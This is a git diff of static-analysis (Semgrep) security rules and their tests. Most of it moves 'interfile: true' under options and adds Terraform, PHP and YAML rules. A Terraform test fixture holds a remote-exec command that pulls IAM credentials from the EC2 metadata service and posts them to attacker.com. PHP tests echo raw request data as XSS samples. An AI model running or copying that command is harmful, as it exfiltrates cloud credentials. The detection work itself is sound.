a/java/spring/security/injection/tainted-url-host.yaml b/java/spring/security/injection/tainted-url-host.yaml index 01bfd4873e..38baaa1a9e 100644 --- a/java/spring/security/injection/tainted-url-host.yaml +++ b/java/spring/security/injection/tainted-url-host.yaml @@ -12,6 +12,8 @@ rules: (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts hardcode the correct host, or ensure that the user data can only affect the path or parameters. + options: + interfile: true metadata: cwe: - 'CWE-918: Server-Side Request Forgery (SSRF)' diff --git a/javascript/browser/security/open-redirect.yaml b/javascript/browser/security/open-redirect.yaml index 4b2a155d21..da86181ff2 100644 --- a/javascript/browser/security/open-redirect.yaml +++ b/javascript/browser/security/open-redirect.yaml @@ -6,6 +6,8 @@ rules: types of vulnerabilities open-redirection and Cross-Site-Scripting (XSS) with JavaScript URIs. It is recommended to validate user-controllable input before allowing it to control the redirection. + options: + interfile: true metadata: interfile: true cwe: diff --git a/javascript/express/security/audit/express-check-directory-listing.yaml b/javascript/express/security/audit/express-check-directory-listing.yaml index b61a0829a1..afc25b663e 100644 --- a/javascript/express/security/audit/express-check-directory-listing.yaml +++ b/javascript/express/security/audit/express-check-directory-listing.yaml @@ -3,6 +3,8 @@ rules: message: Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource. + options: + interfile: true metadata: interfile: true cwe: diff --git a/javascript/express/security/audit/express-libxml-noent.yaml b/javascript/express/security/audit/express-libxml-noent.yaml index 05e979719d..eba8054301 100644 --- a/javascript/express/security/audit/express-libxml-noent.yaml +++ b/javascript/express/security/audit/express-libxml-noent.yaml @@ -5,6 +5,8 @@ rules: set to `true` which can lead to being vulnerable to XML External Entities (XXE) type attacks. It is recommended to set `noent` to `false` when using this feature to ensure you are protected. + options: + interfile: true metadata: interfile: true references: diff --git a/javascript/express/security/audit/express-session-hardcoded-secret.yaml b/javascript/express/security/audit/express-session-hardcoded-secret.yaml index f4396789d7..42598cc565 100644 --- a/javascript/express/security/audit/express-session-hardcoded-secret.yaml +++ b/javascript/express/security/audit/express-session-hardcoded-secret.yaml @@ -6,6 +6,8 @@ rules: being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module). + options: + interfile: true metadata: interfile: true cwe: diff --git a/javascript/express/security/audit/express-third-party-object-deserialization.yaml b/javascript/express/security/audit/express-third-party-object-deserialization.yaml index 4cc28aea69..176bb06655 100644 --- a/javascript/express/security/audit/express-third-party-object-deserialization.yaml +++ b/javascript/express/security/audit/express-third-party-object-deserialization.yaml @@ -3,6 +3,8 @@ rules: message: The following function call $SER.$FUNC accepts user controlled data which can result in Remote Code Execution (RCE) through Object Deserialization. It is recommended to use secure data processing alternatives such as JSON.parse() and Buffer.from(). + options: + interfile: true metadata: interfile: true technology: diff --git a/javascript/express/security/audit/res-render-injection.yaml b/javascript/express/security/audit/res-render-injection.yaml index a56cb16355..4f4f39be5d 100644 --- a/javascript/express/security/audit/res-render-injection.yaml +++ b/javascript/express/security/audit/res-render-injection.yaml @@ -6,6 +6,8 @@ rules: may attempt to use directory traversal techniques e.g. `../folder/index` to access other HTML pages on the file system. Where possible, do not allow users to define what should be loaded in $RES.render or use an allow list for the existing application. + options: + interfile: true metadata: interfile: true owasp: diff --git a/javascript/express/security/audit/xss/direct-response-write.yaml b/javascript/express/security/audit/xss/direct-response-write.yaml index f5bb6c44f9..370edab86c 100644 --- a/javascript/express/security/audit/xss/direct-response-write.yaml +++ b/javascript/express/security/audit/xss/direct-response-write.yaml @@ -5,6 +5,8 @@ rules: any HTML escaping and may expose your application to a Cross-Site-scripting (XSS) vulnerability. Instead, use 'resp.render()' to render safely escaped HTML. + options: + interfile: true metadata: interfile: true references: diff --git a/javascript/express/security/express-expat-xxe.yaml b/javascript/express/security/express-expat-xxe.yaml index e17e9cb6fc..1b0eb43b72 100644 --- a/javascript/express/security/express-expat-xxe.yaml +++ b/javascript/express/security/express-expat-xxe.yaml @@ -4,6 +4,8 @@ rules: Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities. + options: + interfile: true metadata: interfile: true owasp: diff --git a/javascript/express/security/express-insecure-template-usage.yaml b/javascript/express/security/express-insecure-template-usage.yaml index 4b7484f3e8..0512c2380f 100644 --- a/javascript/express/security/express-insecure-template-usage.yaml +++ b/javascript/express/security/express-insecure-template-usage.yaml @@ -2,6 +2,8 @@ rules: - id: express-insecure-template-usage message: User data from `$REQ` is being compiled into the template, which can lead to a Server Side Template Injection (SSTI) vulnerability. + options: + interfile: true metadata: interfile: true category: security diff --git a/javascript/express/security/express-jwt-hardcoded-secret.yaml b/javascript/express/security/express-jwt-hardcoded-secret.yaml index 07032c51dd..e958dd1080 100644 --- a/javascript/express/security/express-jwt-hardcoded-secret.yaml +++ b/javascript/express/security/express-jwt-hardcoded-secret.yaml @@ -6,6 +6,8 @@ rules: being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module). + options: + interfile: true metadata: interfile: true cwe: diff --git a/javascript/express/security/require-request.yaml b/javascript/express/security/require-request.yaml index 546d943aea..780b42bfcf 100644 --- a/javascript/express/security/require-request.yaml +++ b/javascript/express/security/require-request.yaml @@ -3,6 +3,8 @@ rules: message: >- If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server. + options: + interfile: true metadata: interfile: true owasp: diff --git a/javascript/jose/security/jwt-hardcode.yaml b/javascript/jose/security/jwt-hardcode.yaml index 1213edb04a..1a481cb9d8 100644 --- a/javascript/jose/security/jwt-hardcode.yaml +++ b/javascript/jose/security/jwt-hardcode.yaml @@ -69,3 +69,4 @@ rules: $JWT.sign($P, JWK.asKey("..."), ...); options: symbolic_propagation: true + interfile: true diff --git a/javascript/lang/security/audit/code-string-concat.yaml b/javascript/lang/security/audit/code-string-concat.yaml index 3f8c24f1fd..0f356c22bd 100644 --- a/javascript/lang/security/audit/code-string-concat.yaml +++ b/javascript/lang/security/audit/code-string-concat.yaml @@ -4,6 +4,8 @@ rules: Found data from an Express or Next web request flowing to `eval`. If this data is user-controllable this can lead to execution of arbitrary system commands in the context of your application process. Avoid `eval` whenever possible. + options: + interfile: true metadata: interfile: true confidence: HIGH diff --git a/javascript/lang/security/audit/hardcoded-hmac-key.yaml b/javascript/lang/security/audit/hardcoded-hmac-key.yaml index 1daba1a17e..fe5de29d09 100644 --- a/javascript/lang/security/audit/hardcoded-hmac-key.yaml +++ b/javascript/lang/security/audit/hardcoded-hmac-key.yaml @@ -3,6 +3,8 @@ rules: message: >- Detected a hardcoded hmac key. Avoid hardcoding secrets and consider using an alternate option such as reading the secret from a config file or using an environment variable. + options: + interfile: true metadata: interfile: true category: security diff --git a/javascript/sequelize/security/audit/sequelize-injection-express.yaml b/javascript/sequelize/security/audit/sequelize-injection-express.yaml index b312798223..47aa8ded7f 100644 --- a/javascript/sequelize/security/audit/sequelize-injection-express.yaml +++ b/javascript/sequelize/security/audit/sequelize-injection-express.yaml @@ -5,6 +5,8 @@ rules: could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements. + options: + interfile: true metadata: interfile: true references: diff --git a/php/lang/security/injection/echoed-request.php b/php/lang/security/injection/echoed-request.php index 0349a99efc..b232bcba83 100644 --- a/php/lang/security/injection/echoed-request.php +++ b/php/lang/security/injection/echoed-request.php @@ -24,6 +24,10 @@ function doSmth4() { echo "Hello ".htmlentities($_POST['name'])." !".$_POST['lastname']; } +function doSmth5() { + // ruleid: echoed-request + echo "Hello ".trim($_POST['name']); +} function doOK1() { // ok: echoed-request @@ -37,12 +41,9 @@ function doOK2() { } function doOK3() { - $name = $_GET['name']; - if (str_contains($name, 'foobar')) { - $tpl = createSafeTemplate($name); - // ok: echoed-request - echo "Hello :".$tpl; - } + $safevar = "Hello ".htmlentities(trim($_GET['name'])); + // ok: echoed-request + echo $safevar; } function doOK4() { @@ -55,3 +56,17 @@ function doOK5() { // ok: echoed-request echo "Hello $safevar !"; } + +function doOK6() { + $safevar = "Hello ".htmlentities($_GET['name']); + // ok: echoed-request + echo $safevar; +} + +function doOK7() { + $safevar = "Hello ".htmlspecialchars($_GET['name']); + // ok: echoed-request + echo $safevar; +} + + diff --git a/php/lang/security/injection/echoed-request.yaml b/php/lang/security/injection/echoed-request.yaml index 80ef97af84..aeb572ba9d 100644 --- a/php/lang/security/injection/echoed-request.yaml +++ b/php/lang/security/injection/echoed-request.yaml @@ -15,10 +15,8 @@ rules: pattern-sanitizers: - pattern: isset(...) - pattern: empty(...) - - pattern: $X = $ANYFUNC(...); - - patterns: - - pattern-inside: echo <... $ANYFUNC(...) ...>; - - pattern: $ANYFUNC(...) + - pattern: htmlentities(...) + - pattern: htmlspecialchars(...) metadata: technology: - php diff --git a/swift/lang/storage/sensitive-storage-userdefaults.yaml b/swift/lang/storage/sensitive-storage-userdefaults.yaml index bd00b498eb..c5a8c96ee3 100644 --- a/swift/lang/storage/sensitive-storage-userdefaults.yaml +++ b/swift/lang/storage/sensitive-storage-userdefaults.yaml @@ -27,7 +27,7 @@ rules: languages: - swift options: - taint_propagation: true + symbolic_propagation: true patterns: - pattern-either: - patterns: diff --git a/terraform/aws/security/aws-provisioner-exec.tf b/terraform/aws/security/aws-provisioner-exec.tf new file mode 100644 index 0000000000..7c6bdd5bfb --- /dev/null +++ b/terraform/aws/security/aws-provisioner-exec.tf @@ -0,0 +1,71 @@ + +resource "aws_instance" "example" { + ami = "ami-06ca3ca175f37dd66" + instance_type = "t2.micro" + + + associate_public_ip_address = true + # ruleid: aws-provisioner-exec + provisioner "remote-exec" { + inline = [ + "sudo yum install ec2-instance-connect -y", + "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/tf-testing-role > /tmp/awscreds.txt && curl https://attacker.com/creds.php --data-urlencode creds@/tmp/awscreds.txt" + ] + } + + iam_instance_profile = "tf-testing-role" + + connection { + type = "ssh" + user = "ec2-user" + private_key = tls_private_key.this.private_key_openssh + host = self.public_ip + agent = false + } + + key_name = aws_key_pair.this.key_name + + vpc_security_group_ids = [aws_security_group.example.id] + + metadata_options { + http_endpoint = "enabled" + http_tokens = "optional" + http_put_response_hop_limit = 10 + } + + tags = { + Name = "terraform-testing" + } +} + +resource "aws_instance" "example" { + ami = "ami-06ca3ca175f37dd66" // make sure to update this to a valid AMI ID + instance_type = "t2.micro" + + + associate_public_ip_address = true + + iam_instance_profile = "tf-testing-role" + + connection { + type = "ssh" + user = "ec2-user" + private_key = tls_private_key.this.private_key_openssh + host = self.public_ip + agent = false + } + + key_name = aws_key_pair.this.key_name + + vpc_security_group_ids = [aws_security_group.example.id] + + metadata_options { + http_endpoint = "enabled" + http_tokens = "optional" + http_put_response_hop_limit = 10 + } + + tags = { + Name = "terraform-testing" + } +} \ No newline at end of file diff --git a/terraform/aws/security/aws-provisioner-exec.yaml b/terraform/aws/security/aws-provisioner-exec.yaml new file mode 100644 index 0000000000..bfef15e3ba --- /dev/null +++ b/terraform/aws/security/aws-provisioner-exec.yaml @@ -0,0 +1,38 @@ +rules: +- patterns: + - pattern-either: + - pattern: | + provisioner "remote-exec" { + ... + } + - pattern: | + provisioner "local-exec" { + ... + } + - pattern-inside: | + resource "aws_instance" "..." { + ... + } + id: aws-provisioner-exec + message: Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design. + languages: + - terraform + severity: WARNING + metadata: + category: security + owasp: + - 'A03:2021 - Injection' + - 'A01:2017 - Injection' + cwe: + - "CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')" + - "CWE-94: Improper Control of Generation of Code ('Code Injection')" + subcategory: + - guardrail + confidence: HIGH + likelihood: HIGH + impact: MEDIUM + technology: + - terraform + references: + - https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec + - https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec diff --git a/terraform/aws/security/unrestricted-github-oidc-policy.tf b/terraform/aws/security/unrestricted-github-oidc-policy.tf new file mode 100644 index 0000000000..07fe6a3b80 --- /dev/null +++ b/terraform/aws/security/unrestricted-github-oidc-policy.tf @@ -0,0 +1,32 @@ +data "aws_iam_policy_document" "assume-policy-doc" { + # ok: unrestricted-github-oidc-policy + statement { + actions = ["sts:AssumeRoleWithWebIdentity"] + + principals { + type = "Federated" + identifiers = ["arn:aws:iam::${data.aws_caller_identity.current.account_id}:oidc-provider/token.actions.githubusercontent.com"] + } + + condition { + test = "StringLike" + variable = "token.actions.githubusercontent.com:sub" + + values = [ + "repo:octocat/octocat-app:*", + ] + } + } +} + +data "aws_iam_policy_document" "assume-policy-doc-bad" { + # ruleid: unrestricted-github-oidc-policy + statement { + actions = ["sts:AssumeRoleWithWebIdentity"] + + principals { + type = "Federated" + identifiers = ["arn:aws:iam::${data.aws_caller_identity.current.account_id}:oidc-provider/token.actions.githubusercontent.com"] + } + } +} \ No newline at end of file diff --git a/terraform/aws/security/unrestricted-github-oidc-policy.yaml b/terraform/aws/security/unrestricted-github-oidc-policy.yaml new file mode 100644 index 0000000000..443847089f --- /dev/null +++ b/terraform/aws/security/unrestricted-github-oidc-policy.yaml @@ -0,0 +1,50 @@ +rules: + - id: unrestricted-github-oidc-policy + metadata: + category: security + subcategory: + - audit + likelihood: MEDIUM + impact: HIGH + confidence: MEDIUM + technology: + - terraform + - aws + owasp: + - A05:2017 - Sensitive Data Exposure + - A01:2021 - Broken Access Control + cwe: + - "CWE-284: Improper Access Control" + references: + - https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services#configuring-the-role-and-trust-policy + - https://dagrz.com/writing/aws-security/hacking-github-aws-oidc/ + message: "`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this." + languages: + - hcl + severity: WARNING + match: + where: + - metavariable: $IDENTIFIER + regex: .*oidc-provider/token\.actions\.githubusercontent\.com + all: + - inside: | + data "aws_iam_policy_document" $POLICY { + ... + } + - | + statement { + ... + principals { + ... + type = "Federated" + identifiers = [..., $IDENTIFIER, ...] + } + } + - not: | + statement { + ... + condition { + ... + variable = "token.actions.githubusercontent.com:sub" + } + } diff --git a/yaml/semgrep/interfile-true-under-metadata-and-no-options.fixed.test.yaml b/yaml/semgrep/interfile-true-under-metadata-and-no-options.fixed.test.yaml new file mode 100644 index 0000000000..61a9582b84 --- /dev/null +++ b/yaml/semgrep/interfile-true-under-metadata-and-no-options.fixed.test.yaml @@ -0,0 +1,111 @@ +rules: +- id: libxml2-xxe-taint + message: >- + The application is using an XML parser that has not been safely configured. This might lead to XML + External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include + document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead + to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side + request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs + to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs + Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting + the use of external entities from the start can prevent the parser from being used to process untrusted + XML files. Reducing dependencies on external resources is also a good practice for performance reasons. + It is difficult to guarantee that even a trusted XML file on your server or during transmission has + not been tampered with by a malicious third-party. + severity: ERROR + # ruleid: interfile-true-under-metadata-and-no-options + options: + interfile: true + metadata: + likelihood: MEDIUM + impact: HIGH + confidence: HIGH + interfile: true + category: security + subcategory: + - vuln + cwe: + - 'CWE-611: Improper Restriction of XML External Entity Reference' + cwe2020-top25: true + cwe2021-top25: true + cwe2022-top25: true + owasp: + - A04:2017 - XML External Entities (XXE) + - A05:2021 - Security Misconfiguration + references: + - https://owasp.org/Top10/A05_2021-Security_Misconfiguration + technology: + - go + - libxml2 + - go + - go-net/http + - gin + - gin-gonic/gin + languages: + - go + mode: taint + pattern-sources: + - patterns: + - pattern-either: + - pattern: | + ($REQ : http.Request).$FIELD + - pattern: | + ($REQ : *http.Request).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(BasicAuth|Body|Cookie|Cookies|Form|FormValue|GetBody|Host|Header|MultipartReader|ParseForm|ParseMultipartForm|PostForm|PostFormValue|Referer|RequestURI|Trailer|TransferEncoding|URL|UserAgent)$ + - patterns: + - pattern-inside: | + import "github.com/gin-gonic/gin" + ... + - pattern-either: + - patterns: + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).$FIELD + - pattern: | + ($CONTEXT : *gin.Context).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(Cookie|DefaultPostForm|DefaultQuery|FormFile|GetHeader|GetPostForm|GetPostFormArray|GetPostFormMap|GetQuery|GetQueryArray|GetQueryMap|GetRawData|MultipartForm|Param|Params|PostForm|PostFormArray|PostFormMap|Query|QueryArray|QueryMap)$ + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).Request.URL.Query().Get(...) + - pattern: | + ($CONTEXT : *gin.Context).Request.URL.Query().Get(...) + pattern-sinks: + - patterns: + - patterns: + - pattern-inside: | + import "$IMPORT" + ... + - metavariable-regex: + metavariable: $IMPORT + regex: (.*lestrrat-go/libxml2.*) + - patterns: + - pattern-either: + - patterns: + - pattern-inside: | + $P = parser.New($OPTS) + ... + - pattern: | + $P.$PARSE($INPUT) + - pattern: | + parser.New($OPTS).$PARSE($INPUT) + - pattern: | + NewCtxt($INPUT, $OPTS) + - focus-metavariable: $INPUT + - metavariable-regex: + metavariable: $PARSE + regex: ^(Parse|ParseHTML|ParseHTMLReader|ParseHTMLString|ParseReader|ParseString)$ + - metavariable-pattern: + metavariable: $OPTS + patterns: + - pattern-either: + - pattern: | + XMLParseNoEnt + - pattern: | + parser.XMLParseNoEnt + diff --git a/yaml/semgrep/interfile-true-under-metadata-and-no-options.test.yaml b/yaml/semgrep/interfile-true-under-metadata-and-no-options.test.yaml new file mode 100644 index 0000000000..2a3c3e67a4 --- /dev/null +++ b/yaml/semgrep/interfile-true-under-metadata-and-no-options.test.yaml @@ -0,0 +1,109 @@ +rules: +- id: libxml2-xxe-taint + message: >- + The application is using an XML parser that has not been safely configured. This might lead to XML + External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include + document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead + to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side + request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs + to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs + Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting + the use of external entities from the start can prevent the parser from being used to process untrusted + XML files. Reducing dependencies on external resources is also a good practice for performance reasons. + It is difficult to guarantee that even a trusted XML file on your server or during transmission has + not been tampered with by a malicious third-party. + severity: ERROR + # ruleid: interfile-true-under-metadata-and-no-options + metadata: + likelihood: MEDIUM + impact: HIGH + confidence: HIGH + interfile: true + category: security + subcategory: + - vuln + cwe: + - 'CWE-611: Improper Restriction of XML External Entity Reference' + cwe2020-top25: true + cwe2021-top25: true + cwe2022-top25: true + owasp: + - A04:2017 - XML External Entities (XXE) + - A05:2021 - Security Misconfiguration + references: + - https://owasp.org/Top10/A05_2021-Security_Misconfiguration + technology: + - go + - libxml2 + - go + - go-net/http + - gin + - gin-gonic/gin + languages: + - go + mode: taint + pattern-sources: + - patterns: + - pattern-either: + - pattern: | + ($REQ : http.Request).$FIELD + - pattern: | + ($REQ : *http.Request).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(BasicAuth|Body|Cookie|Cookies|Form|FormValue|GetBody|Host|Header|MultipartReader|ParseForm|ParseMultipartForm|PostForm|PostFormValue|Referer|RequestURI|Trailer|TransferEncoding|URL|UserAgent)$ + - patterns: + - pattern-inside: | + import "github.com/gin-gonic/gin" + ... + - pattern-either: + - patterns: + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).$FIELD + - pattern: | + ($CONTEXT : *gin.Context).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(Cookie|DefaultPostForm|DefaultQuery|FormFile|GetHeader|GetPostForm|GetPostFormArray|GetPostFormMap|GetQuery|GetQueryArray|GetQueryMap|GetRawData|MultipartForm|Param|Params|PostForm|PostFormArray|PostFormMap|Query|QueryArray|QueryMap)$ + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).Request.URL.Query().Get(...) + - pattern: | + ($CONTEXT : *gin.Context).Request.URL.Query().Get(...) + pattern-sinks: + - patterns: + - patterns: + - pattern-inside: | + import "$IMPORT" + ... + - metavariable-regex: + metavariable: $IMPORT + regex: (.*lestrrat-go/libxml2.*) + - patterns: + - pattern-either: + - patterns: + - pattern-inside: | + $P = parser.New($OPTS) + ... + - pattern: | + $P.$PARSE($INPUT) + - pattern: | + parser.New($OPTS).$PARSE($INPUT) + - pattern: | + NewCtxt($INPUT, $OPTS) + - focus-metavariable: $INPUT + - metavariable-regex: + metavariable: $PARSE + regex: ^(Parse|ParseHTML|ParseHTMLReader|ParseHTMLString|ParseReader|ParseString)$ + - metavariable-pattern: + metavariable: $OPTS + patterns: + - pattern-either: + - pattern: | + XMLParseNoEnt + - pattern: | + parser.XMLParseNoEnt + diff --git a/yaml/semgrep/interfile-true-under-metadata-and-no-options.yaml b/yaml/semgrep/interfile-true-under-metadata-and-no-options.yaml new file mode 100644 index 0000000000..fc87f97cec --- /dev/null +++ b/yaml/semgrep/interfile-true-under-metadata-and-no-options.yaml @@ -0,0 +1,35 @@ +rules: + - id: interfile-true-under-metadata-and-no-options + message: "`interfile: true` should be under the `options` field, not the + `metadata` field." + languages: + - yaml + severity: WARNING + patterns: + - pattern: | + rules: + - id: $ID + ... + $METADATA: + ... + $INTERFILE: true + ... + ... + - pattern-not-inside: | + rules: + - id: $ID + ... + options: + ... + ... + - metavariable-regex: + metavariable: $INTERFILE + regex: interfile + - metavariable-regex: + metavariable: $METADATA + regex: metadata + - focus-metavariable: $METADATA + fix: | + options: + interfile: true + metadata diff --git a/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.fixed.test.yaml b/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.fixed.test.yaml new file mode 100644 index 0000000000..e46ab60f60 --- /dev/null +++ b/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.fixed.test.yaml @@ -0,0 +1,112 @@ +rules: +- id: libxml2-xxe-taint + message: >- + The application is using an XML parser that has not been safely configured. This might lead to XML + External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include + document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead + to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side + request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs + to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs + Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting + the use of external entities from the start can prevent the parser from being used to process untrusted + XML files. Reducing dependencies on external resources is also a good practice for performance reasons. + It is difficult to guarantee that even a trusted XML file on your server or during transmission has + not been tampered with by a malicious third-party. + severity: ERROR + options: + # ruleid: interfile-true-under-metadata-and-options-already-present + symbolic_propagation: true + interfile: true + metadata: + likelihood: MEDIUM + impact: HIGH + confidence: HIGH + interfile: true + category: security + subcategory: + - vuln + cwe: + - 'CWE-611: Improper Restriction of XML External Entity Reference' + cwe2020-top25: true + cwe2021-top25: true + cwe2022-top25: true + owasp: + - A04:2017 - XML External Entities (XXE) + - A05:2021 - Security Misconfiguration + references: + - https://owasp.org/Top10/A05_2021-Security_Misconfiguration + technology: + - go + - libxml2 + - go + - go-net/http + - gin + - gin-gonic/gin + languages: + - go + mode: taint + pattern-sources: + - patterns: + - pattern-either: + - pattern: | + ($REQ : http.Request).$FIELD + - pattern: | + ($REQ : *http.Request).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(BasicAuth|Body|Cookie|Cookies|Form|FormValue|GetBody|Host|Header|MultipartReader|ParseForm|ParseMultipartForm|PostForm|PostFormValue|Referer|RequestURI|Trailer|TransferEncoding|URL|UserAgent)$ + - patterns: + - pattern-inside: | + import "github.com/gin-gonic/gin" + ... + - pattern-either: + - patterns: + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).$FIELD + - pattern: | + ($CONTEXT : *gin.Context).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(Cookie|DefaultPostForm|DefaultQuery|FormFile|GetHeader|GetPostForm|GetPostFormArray|GetPostFormMap|GetQuery|GetQueryArray|GetQueryMap|GetRawData|MultipartForm|Param|Params|PostForm|PostFormArray|PostFormMap|Query|QueryArray|QueryMap)$ + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).Request.URL.Query().Get(...) + - pattern: | + ($CONTEXT : *gin.Context).Request.URL.Query().Get(...) + pattern-sinks: + - patterns: + - patterns: + - pattern-inside: | + import "$IMPORT" + ... + - metavariable-regex: + metavariable: $IMPORT + regex: (.*lestrrat-go/libxml2.*) + - patterns: + - pattern-either: + - patterns: + - pattern-inside: | + $P = parser.New($OPTS) + ... + - pattern: | + $P.$PARSE($INPUT) + - pattern: | + parser.New($OPTS).$PARSE($INPUT) + - pattern: | + NewCtxt($INPUT, $OPTS) + - focus-metavariable: $INPUT + - metavariable-regex: + metavariable: $PARSE + regex: ^(Parse|ParseHTML|ParseHTMLReader|ParseHTMLString|ParseReader|ParseString)$ + - metavariable-pattern: + metavariable: $OPTS + patterns: + - pattern-either: + - pattern: | + XMLParseNoEnt + - pattern: | + parser.XMLParseNoEnt + diff --git a/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.test.yaml b/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.test.yaml new file mode 100644 index 0000000000..d5900f6375 --- /dev/null +++ b/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.test.yaml @@ -0,0 +1,111 @@ +rules: +- id: libxml2-xxe-taint + message: >- + The application is using an XML parser that has not been safely configured. This might lead to XML + External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include + document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead + to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side + request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs + to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs + Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting + the use of external entities from the start can prevent the parser from being used to process untrusted + XML files. Reducing dependencies on external resources is also a good practice for performance reasons. + It is difficult to guarantee that even a trusted XML file on your server or during transmission has + not been tampered with by a malicious third-party. + severity: ERROR + options: + # ruleid: interfile-true-under-metadata-and-options-already-present + symbolic_propagation: true + metadata: + likelihood: MEDIUM + impact: HIGH + confidence: HIGH + interfile: true + category: security + subcategory: + - vuln + cwe: + - 'CWE-611: Improper Restriction of XML External Entity Reference' + cwe2020-top25: true + cwe2021-top25: true + cwe2022-top25: true + owasp: + - A04:2017 - XML External Entities (XXE) + - A05:2021 - Security Misconfiguration + references: + - https://owasp.org/Top10/A05_2021-Security_Misconfiguration + technology: + - go + - libxml2 + - go + - go-net/http + - gin + - gin-gonic/gin + languages: + - go + mode: taint + pattern-sources: + - patterns: + - pattern-either: + - pattern: | + ($REQ : http.Request).$FIELD + - pattern: | + ($REQ : *http.Request).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(BasicAuth|Body|Cookie|Cookies|Form|FormValue|GetBody|Host|Header|MultipartReader|ParseForm|ParseMultipartForm|PostForm|PostFormValue|Referer|RequestURI|Trailer|TransferEncoding|URL|UserAgent)$ + - patterns: + - pattern-inside: | + import "github.com/gin-gonic/gin" + ... + - pattern-either: + - patterns: + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).$FIELD + - pattern: | + ($CONTEXT : *gin.Context).$FIELD + - metavariable-regex: + metavariable: $FIELD + regex: + ^(Cookie|DefaultPostForm|DefaultQuery|FormFile|GetHeader|GetPostForm|GetPostFormArray|GetPostFormMap|GetQuery|GetQueryArray|GetQueryMap|GetRawData|MultipartForm|Param|Params|PostForm|PostFormArray|PostFormMap|Query|QueryArray|QueryMap)$ + - pattern-either: + - pattern: | + ($CONTEXT : gin.Context).Request.URL.Query().Get(...) + - pattern: | + ($CONTEXT : *gin.Context).Request.URL.Query().Get(...) + pattern-sinks: + - patterns: + - patterns: + - pattern-inside: | + import "$IMPORT" + ... + - metavariable-regex: + metavariable: $IMPORT + regex: (.*lestrrat-go/libxml2.*) + - patterns: + - pattern-either: + - patterns: + - pattern-inside: | + $P = parser.New($OPTS) + ... + - pattern: | + $P.$PARSE($INPUT) + - pattern: | + parser.New($OPTS).$PARSE($INPUT) + - pattern: | + NewCtxt($INPUT, $OPTS) + - focus-metavariable: $INPUT + - metavariable-regex: + metavariable: $PARSE + regex: ^(Parse|ParseHTML|ParseHTMLReader|ParseHTMLString|ParseReader|ParseString)$ + - metavariable-pattern: + metavariable: $OPTS + patterns: + - pattern-either: + - pattern: | + XMLParseNoEnt + - pattern: | + parser.XMLParseNoEnt + diff --git a/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.yaml b/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.yaml new file mode 100644 index 0000000000..c65a7a35a7 --- /dev/null +++ b/yaml/semgrep/interfile-true-under-metadata-and-options-already-present.yaml @@ -0,0 +1,46 @@ +rules: + - id: interfile-true-under-metadata-and-options-already-present + message: >- + `interfile: true` should be under the `options` field, not the 